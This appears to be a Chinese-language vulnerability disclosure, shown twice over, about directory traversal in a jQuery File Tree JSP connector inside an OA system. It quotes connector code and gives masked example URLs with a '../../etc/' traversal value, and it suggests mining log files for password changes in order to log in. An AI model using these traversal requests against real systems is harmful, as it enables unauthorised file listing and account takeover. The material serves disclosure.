可遍历至操作系统任意目录,只能查看文件名及大小等信息,但是遍历整个oa的目录,收获还是很大的,比如log文件、文本文件等都会对渗透有很大的帮助。有些log文件会包含数据库操作记录,比如更改oa登录密码等,如此便可不费吹灰之力登录oa。 文件:/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp jqueryFileTree在很多通用软件中用的还比较多,该文件接受dir参数来浏览指定的目录,部分代码: ``` /** * jQuery File Tree JSP Connector * Version 1.0 * Copyright 2008 Joshua Gould * 21 April 2008 */ String dir = request.getParameter("dir"); //System.out.println("dir==="+dir); if (dir == null) { return; } …… …… if(!fileInfo.equals("[")){ fileInfo = fileInfo.substring(0,fileInfo.length()-1); } fileInfo +="]"; out.println("$%^&"+fileInfo); } ``` 当dir=/时,默认是oa系统即网站根目录,可通过../遍历至操作系统其他目录。 案例: http://**.**.**.**/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/ http://**.**.**.**/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/../../etc/ 如下图: ...
可遍历至操作系统任意目录,只能查看文件名及大小等信息,但是遍历整个oa的目录,收获还是很大的,比如log文件、文本文件等都会对渗透有很大的帮助。有些log文件会包含数据库操作记录,比如更改oa登录密码等,如此便可不费吹灰之力登录oa。 文件:/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp jqueryFileTree在很多通用软件中用的还比较多,该文件接受dir参数来浏览指定的目录,部分代码: ``` /** * jQuery File Tree JSP Connector * Version 1.0 * Copyright 2008 Joshua Gould * 21 April 2008 */ String dir = request.getParameter("dir"); //System.out.println("dir==="+dir); if (dir == null) { return; } …… …… if(!fileInfo.equals("[")){ fileInfo = fileInfo.substring(0,fileInfo.length()-1); } fileInfo +="]"; out.println("$%^&"+fileInfo); } ``` 当dir=/时,默认是oa系统即网站根目录,可通过../遍历至操作系统其他目录。 案例: http://**.**.**.**/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/ http://**.**.**.**/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/../../etc/ 如下图:  
